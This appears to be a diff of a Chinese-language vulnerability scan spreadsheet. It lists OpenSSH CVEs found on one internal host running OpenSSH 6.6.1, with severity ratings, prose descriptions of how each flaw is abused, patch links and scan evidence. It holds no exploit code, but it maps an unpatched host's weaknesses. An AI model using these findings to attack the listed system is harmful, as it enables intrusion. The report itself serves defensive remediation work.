       <c r="E12" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F12" t="inlineStr">
         <is>
-          <t>OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的keyboard-interactive设备。远程攻击者可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务（CPU消耗）。</t>
+          <t>OpenSSH 7.8及之前版本中的auth-gss2.c文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。</t>
         </is>
       </c>
       <c r="G12" t="inlineStr">
@@ -1746,7 +1746,7 @@
       </c>
       <c r="J12" t="inlineStr">
         <is>
-          <t>CVE-2015-5600</t>
+          <t>CVE-2018-15919</t>
         </is>
       </c>
       <c r="K12" t="inlineStr">
@@ -1816,7 +1816,7 @@
     <row r="13">
       <c r="A13" t="inlineStr">
         <is>
-          <t>OpenSSH 信息泄漏漏洞(CVE-2018-15919)</t>
+          <t>OpenSSH Maxauthtries限制绕过漏洞(CVE-2015-5600)</t>
         </is>
       </c>
       <c r="B13" t="inlineStr">
@@ -1826,22 +1826,22 @@
       </c>
       <c r="C13" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D13" t="inlineStr">
         <is>
-          <t>信息泄露</t>
+          <t>越权访问</t>
         </is>
       </c>
       <c r="E13" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
         </is>
       </c>
       <c r="F13" t="inlineStr">
         <is>
-          <t>OpenSSH 7.8及之前版本中的auth-gss2.c文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。</t>
+          <t>OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的keyboard-interactive设备。远程攻击者可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务（CPU消耗）。</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
@@ -1861,7 +1861,7 @@
       </c>
       <c r="J13" t="inlineStr">
         <is>
-          <t>CVE-2018-15919</t>
+          <t>CVE-2015-5600</t>
         </is>
       </c>
       <c r="K13" t="inlineStr">
@@ -2398,7 +2398,7 @@
     <row r="18">
       <c r="A18" t="inlineStr">
         <is>
-          <t>OpenSSH cbc模式信息泄露漏洞(CVE-2008-5161)</t>
+          <t>ftp banner信息获取</t>
         </is>
       </c>
       <c r="B18" t="inlineStr">
@@ -2413,18 +2413,17 @@
       </c>
       <c r="D18" t="inlineStr">
         <is>
-          <t>信息泄露</t>
+          <t>信息发现</t>
         </is>
       </c>
       <c r="E18" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-https://downloads.ssh.com/</t>
+          <t>非漏洞</t>
         </is>
       </c>
       <c r="F18" t="inlineStr">
         <is>
-          <t>OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。如果配置为CBC模式的话，OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误，导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时，攻击者恢复32位纯文本的成功概率为2^{-18}，此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。</t>
+          <t>此插件用来获取ftp服务的banner信息</t>
         </is>
       </c>
       <c r="G18" t="inlineStr">
@@ -2442,11 +2441,7 @@
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J18" t="inlineStr">
-        <is>
-          <t>CVE-2008-5161</t>
-        </is>
-      </c>
+      <c r="J18" t="inlineStr"/>
       <c r="K18" t="inlineStr">
         <is>
           <t>2026-07-24 16:33</t>
@@ -2486,20 +2481,143 @@
       </c>
       <c r="T18" t="inlineStr">
         <is>
+          <t>21</t>
+        </is>
+      </c>
+      <c r="U18" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:21</t>
+        </is>
+      </c>
+      <c r="V18" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W18" t="inlineStr">
+        <is>
+          <t>页面url: http://10.128.160.50:21
+请求体: -
+响应体: -
+举证描述: 成功获取ftp的banner信息</t>
+        </is>
+      </c>
+      <c r="X18" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y18" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>OpenSSH cbc模式信息泄露漏洞(CVE-2008-5161)</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t>建议修复</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t>信息泄露</t>
+        </is>
+      </c>
+      <c r="E19" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+https://downloads.ssh.com/</t>
+        </is>
+      </c>
+      <c r="F19" t="inlineStr">
+        <is>
+          <t>OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。如果配置为CBC模式的话，OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误，导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时，攻击者恢复32位纯文本的成功概率为2^{-18}，此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。</t>
+        </is>
+      </c>
+      <c r="G19" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H19" t="inlineStr">
+        <is>
+          <t>云镜-服务版</t>
+        </is>
+      </c>
+      <c r="I19" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J19" t="inlineStr">
+        <is>
+          <t>CVE-2008-5161</t>
+        </is>
+      </c>
+      <c r="K19" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="L19" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="M19" t="inlineStr">
+        <is>
+          <t>10.128.160.50</t>
+        </is>
+      </c>
+      <c r="N19" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O19" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P19" t="inlineStr"/>
+      <c r="Q19" t="inlineStr"/>
+      <c r="R19" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S19" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T19" t="inlineStr">
+        <is>
           <t>22</t>
         </is>
       </c>
-      <c r="U18" t="inlineStr">
+      <c r="U19" t="inlineStr">
         <is>
           <t>http://10.128.160.50:22</t>
         </is>
       </c>
-      <c r="V18" t="inlineStr">
+      <c r="V19" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="W18" t="inlineStr">
+      <c r="W19" t="inlineStr">
         <is>
           <t>页面url: http://10.128.160.50:22
 请求体: -
@@ -2507,124 +2625,6 @@
 举证描述: 当前openssh为CBC模式，成功读取到泄露文本，检测存在漏洞</t>
         </is>
       </c>
-      <c r="X18" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y18" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="19">
-      <c r="A19" t="inlineStr">
-        <is>
-          <t>ftp banner信息获取</t>
-        </is>
-      </c>
-      <c r="B19" t="inlineStr">
-        <is>
-          <t>建议修复</t>
-        </is>
-      </c>
-      <c r="C19" t="inlineStr">
-        <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D19" t="inlineStr">
-        <is>
-          <t>信息发现</t>
-        </is>
-      </c>
-      <c r="E19" t="inlineStr">
-        <is>
-          <t>非漏洞</t>
-        </is>
-      </c>
-      <c r="F19" t="inlineStr">
-        <is>
-          <t>此插件用来获取ftp服务的banner信息</t>
-        </is>
-      </c>
-      <c r="G19" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
-      <c r="H19" t="inlineStr">
-        <is>
-          <t>云镜-服务版</t>
-        </is>
-      </c>
-      <c r="I19" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J19" t="inlineStr"/>
-      <c r="K19" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="L19" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="M19" t="inlineStr">
-        <is>
-          <t>10.128.160.50</t>
-        </is>
-      </c>
-      <c r="N19" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O19" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P19" t="inlineStr"/>
-      <c r="Q19" t="inlineStr"/>
-      <c r="R19" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S19" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T19" t="inlineStr">
-        <is>
-          <t>21</t>
-        </is>
-      </c>
-      <c r="U19" t="inlineStr">
-        <is>
-          <t>http://10.128.160.50:21</t>
-        </is>
-      </c>
-      <c r="V19" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W19" t="inlineStr">
-        <is>
-          <t>页面url: http://10.128.160.50:21
-请求体: -
-响应体: -
-举证描述: 成功获取ftp的banner信息</t>
-        </is>
-      </c>
       <c r="X19" t="inlineStr">
         <is>
           <t>待处置</t>
@@ -2639,277 +2639,277 @@
     <row r="20">
       <c r="A20" t="inlineStr">
         <is>
+          <t>OpenSSH命令注入漏洞(CVE-2023-51385)</t>
+        </is>
+      </c>
+      <c r="B20" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C20" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
+      <c r="E20" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：
+https://www.openssh.com/openbsd.html</t>
+        </is>
+      </c>
+      <c r="F20" t="inlineStr">
+        <is>
+          <t>该漏洞是由于OpenSSH处理主机名称中的特殊符号不严谨，如果用户名或主机名中含有shell元字符（如 | ‘ “等），并且ssh_config中ProxyCommand、LocalCommand指令或”match exec”谓词通过%u、%h或类似的扩展标记引用用户或主机名时，可能会发生命令注入。攻击者可利用该漏洞在获得权限或钓鱼攻击的情况下，构造恶意数据执行命令注入攻击.</t>
+        </is>
+      </c>
+      <c r="G20" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H20" t="inlineStr">
+        <is>
+          <t>云镜-服务版</t>
+        </is>
+      </c>
+      <c r="I20" t="inlineStr">
+        <is>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J20" t="inlineStr">
+        <is>
+          <t>CVE-2023-51385</t>
+        </is>
+      </c>
+      <c r="K20" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="L20" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="M20" t="inlineStr">
+        <is>
+          <t>10.128.160.50</t>
+        </is>
+      </c>
+      <c r="N20" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O20" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P20" t="inlineStr"/>
+      <c r="Q20" t="inlineStr"/>
+      <c r="R20" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S20" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T20" t="inlineStr">
+        <is>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U20" t="inlineStr"/>
+      <c r="V20" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W20" t="inlineStr">
+        <is>
+          <t>组件及版本: OpenSSH:6.6.1</t>
+        </is>
+      </c>
+      <c r="X20" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y20" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>openssh 安全漏洞 (CVE-2023-48795)</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr"/>
+      <c r="E21" t="inlineStr">
+        <is>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
+        </is>
+      </c>
+      <c r="F21" t="inlineStr">
+        <is>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于允许远程攻击者绕过完整性检查，从而省略某些数据包。</t>
+        </is>
+      </c>
+      <c r="G21" t="inlineStr"/>
+      <c r="H21" t="inlineStr">
+        <is>
+          <t>云镜-服务版</t>
+        </is>
+      </c>
+      <c r="I21" t="inlineStr">
+        <is>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J21" t="inlineStr">
+        <is>
+          <t>CVE-2023-48795</t>
+        </is>
+      </c>
+      <c r="K21" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="L21" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="M21" t="inlineStr">
+        <is>
+          <t>10.128.160.50</t>
+        </is>
+      </c>
+      <c r="N21" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O21" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P21" t="inlineStr"/>
+      <c r="Q21" t="inlineStr"/>
+      <c r="R21" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S21" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T21" t="inlineStr">
+        <is>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U21" t="inlineStr"/>
+      <c r="V21" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W21" t="inlineStr">
+        <is>
+          <t>组件及版本: OpenSSH:6.6.1</t>
+        </is>
+      </c>
+      <c r="X21" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y21" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="22">
+      <c r="A22" t="inlineStr">
+        <is>
           <t>OpenSSH ssh-agent远程代码执行漏洞(CVE-2023-38408)</t>
         </is>
       </c>
-      <c r="B20" t="inlineStr">
+      <c r="B22" t="inlineStr">
         <is>
           <t>尽快修复</t>
         </is>
       </c>
-      <c r="C20" t="inlineStr">
+      <c r="C22" t="inlineStr">
         <is>
           <t>高危</t>
         </is>
       </c>
-      <c r="D20" t="inlineStr">
+      <c r="D22" t="inlineStr">
         <is>
           <t>代码执行</t>
         </is>
       </c>
-      <c r="E20" t="inlineStr">
+      <c r="E22" t="inlineStr">
         <is>
           <t>该漏洞在OpenSSH 9.3p2版本中已得到修复。建议用户升级到最新版本。对于 OpenBSD，发布了一个勘误补丁来修复此问题。
 链接如下：https://www.openssh.com/releasenotes.html
 https://www.openbsd.org/errata.html</t>
         </is>
       </c>
-      <c r="F20" t="inlineStr">
+      <c r="F22" t="inlineStr">
         <is>
           <t>OpenSSH 的 ssh-agent 中存在了一个远程代码执行漏洞。此漏洞允许远程攻击者在存在漏洞的 OpenSSH的 forwarded ssh-agent 代理上执行任意命令。</t>
         </is>
       </c>
-      <c r="G20" t="inlineStr">
+      <c r="G22" t="inlineStr">
         <is>
           <t>有攻击代码披露</t>
         </is>
       </c>
-      <c r="H20" t="inlineStr">
+      <c r="H22" t="inlineStr">
         <is>
           <t>云镜-服务版</t>
         </is>
       </c>
-      <c r="I20" t="inlineStr">
+      <c r="I22" t="inlineStr">
         <is>
           <t>版本比对</t>
         </is>
       </c>
-      <c r="J20" t="inlineStr">
+      <c r="J22" t="inlineStr">
         <is>
           <t>CVE-2023-38408</t>
-        </is>
-      </c>
-      <c r="K20" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="L20" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="M20" t="inlineStr">
-        <is>
-          <t>10.128.160.50</t>
-        </is>
-      </c>
-      <c r="N20" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O20" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P20" t="inlineStr"/>
-      <c r="Q20" t="inlineStr"/>
-      <c r="R20" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S20" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T20" t="inlineStr">
-        <is>
-          <t>22</t>
-        </is>
-      </c>
-      <c r="U20" t="inlineStr"/>
-      <c r="V20" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W20" t="inlineStr">
-        <is>
-          <t>组件及版本: OpenSSH:6.6.1</t>
-        </is>
-      </c>
-      <c r="X20" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y20" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="21">
-      <c r="A21" t="inlineStr">
-        <is>
-          <t>openssh 安全漏洞 (CVE-2023-48795)</t>
-        </is>
-      </c>
-      <c r="B21" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C21" t="inlineStr">
-        <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D21" t="inlineStr"/>
-      <c r="E21" t="inlineStr">
-        <is>
-          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
-        </is>
-      </c>
-      <c r="F21" t="inlineStr">
-        <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于允许远程攻击者绕过完整性检查，从而省略某些数据包。</t>
-        </is>
-      </c>
-      <c r="G21" t="inlineStr"/>
-      <c r="H21" t="inlineStr">
-        <is>
-          <t>云镜-服务版</t>
-        </is>
-      </c>
-      <c r="I21" t="inlineStr">
-        <is>
-          <t>版本比对</t>
-        </is>
-      </c>
-      <c r="J21" t="inlineStr">
-        <is>
-          <t>CVE-2023-48795</t>
-        </is>
-      </c>
-      <c r="K21" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="L21" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="M21" t="inlineStr">
-        <is>
-          <t>10.128.160.50</t>
-        </is>
-      </c>
-      <c r="N21" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O21" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P21" t="inlineStr"/>
-      <c r="Q21" t="inlineStr"/>
-      <c r="R21" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S21" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T21" t="inlineStr">
-        <is>
-          <t>22</t>
-        </is>
-      </c>
-      <c r="U21" t="inlineStr"/>
-      <c r="V21" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W21" t="inlineStr">
-        <is>
-          <t>组件及版本: OpenSSH:6.6.1</t>
-        </is>
-      </c>
-      <c r="X21" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y21" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="22">
-      <c r="A22" t="inlineStr">
-        <is>
-          <t>OpenSSH命令注入漏洞(CVE-2023-51385)</t>
-        </is>
-      </c>
-      <c r="B22" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C22" t="inlineStr">
-        <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D22" t="inlineStr">
-        <is>
-          <t>命令执行</t>
-        </is>
-      </c>
-      <c r="E22" t="inlineStr">
-        <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：
-https://www.openssh.com/openbsd.html</t>
-        </is>
-      </c>
-      <c r="F22" t="inlineStr">
-        <is>
-          <t>该漏洞是由于OpenSSH处理主机名称中的特殊符号不严谨，如果用户名或主机名中含有shell元字符（如 | ‘ “等），并且ssh_config中ProxyCommand、LocalCommand指令或”match exec”谓词通过%u、%h或类似的扩展标记引用用户或主机名时，可能会发生命令注入。攻击者可利用该漏洞在获得权限或钓鱼攻击的情况下，构造恶意数据执行命令注入攻击.</t>
-        </is>
-      </c>
-      <c r="G22" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
-      <c r="H22" t="inlineStr">
-        <is>
-          <t>云镜-服务版</t>
-        </is>
-      </c>
-      <c r="I22" t="inlineStr">
-        <is>
-          <t>版本比对</t>
-        </is>
-      </c>
-      <c r="J22" t="inlineStr">
-        <is>
-          <t>CVE-2023-51385</t>
         </is>
       </c>
       <c r="K22" t="inlineStr">
@@ -2979,32 +2979,33 @@
     <row r="23">
       <c r="A23" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2016-0777)</t>
+          <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
         </is>
       </c>
       <c r="B23" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>低危</t>
         </is>
       </c>
       <c r="D23" t="inlineStr">
         <is>
-          <t>信息泄露</t>
+          <t>授权问题</t>
         </is>
       </c>
       <c r="E23" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://www.openssh.com/security.html</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>远程攻击者可通过请求传输整个缓冲区利用该漏洞获取进程内存中的敏感信息。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 
+OpenSSH 8.9 之前的版本中存在安全漏洞。该漏洞源于客户端使用带代理转发但没有 -oLogLevel=verbose 的公钥身份验证。</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -3024,7 +3025,7 @@
       </c>
       <c r="J23" t="inlineStr">
         <is>
-          <t>CVE-2016-0777</t>
+          <t>CVE-2021-36368</t>
         </is>
       </c>
       <c r="K23" t="inlineStr">
@@ -3094,7 +3095,7 @@
     <row r="24">
       <c r="A24" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
+          <t>OpenSSH信息泄露漏洞(CVE-2020-14145)</t>
         </is>
       </c>
       <c r="B24" t="inlineStr">
@@ -3104,18 +3105,23 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D24" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr">
+        <is>
+          <t>信息泄露</t>
+        </is>
+      </c>
       <c r="E24" t="inlineStr">
         <is>
-          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/security.html</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
+https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH存在安全漏洞。该漏洞源于允许权限提升，因为补充组未按预期初始化。</t>
+          <t>OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 5.7版本至8.4版本的客户端中存在信息泄露漏洞。攻击者可利用该漏洞获取信息。</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -3135,7 +3141,7 @@
       </c>
       <c r="J24" t="inlineStr">
         <is>
-          <t>CVE-2021-41617</t>
+          <t>CVE-2020-14145</t>
         </is>
       </c>
       <c r="K24" t="inlineStr">
@@ -3205,7 +3211,7 @@
     <row r="25">
       <c r="A25" t="inlineStr">
         <is>
-          <t>openssh 安全漏洞 (CVE-2023-51384)</t>
+          <t>OpenSSH xauth命令注入漏洞(CVE-2016-3115)</t>
         </is>
       </c>
       <c r="B25" t="inlineStr">
@@ -3218,15 +3224,20 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D25" t="inlineStr"/>
+      <c r="D25" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
       <c r="E25" t="inlineStr">
         <is>
-          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/x11fwd.adv</t>
         </is>
       </c>
       <c r="F25" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于当在添加PKCS11托管私钥的过程中指定目标约束时，这些约束仅应用于第一个密钥。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.2p1及之前版本的sshd中的session.c文件中存在CRLF注入漏洞。远程攻击者可借助特制的X11转发数据利用该漏洞绕过既定的shell-command限制。</t>
         </is>
       </c>
       <c r="G25" t="inlineStr">
@@ -3246,7 +3257,7 @@
       </c>
       <c r="J25" t="inlineStr">
         <is>
-          <t>CVE-2023-51384</t>
+          <t>CVE-2016-3115</t>
         </is>
       </c>
       <c r="K25" t="inlineStr">
@@ -3316,7 +3327,7 @@
     <row r="26">
       <c r="A26" t="inlineStr">
         <is>
-          <t>OpenSSH x11_open_helper()函数安全限制绕过漏洞(CVE-2015-5352)</t>
+          <t>OpenSSH sshd monitor.c文件权限许可和访问控制漏洞(CVE-2015-6564)</t>
         </is>
       </c>
       <c r="B26" t="inlineStr">
@@ -3331,18 +3342,17 @@
       </c>
       <c r="D26" t="inlineStr">
         <is>
-          <t>防御绕过</t>
+          <t>访问控制错误</t>
         </is>
       </c>
       <c r="E26" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/release-6.9</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F26" t="inlineStr">
         <is>
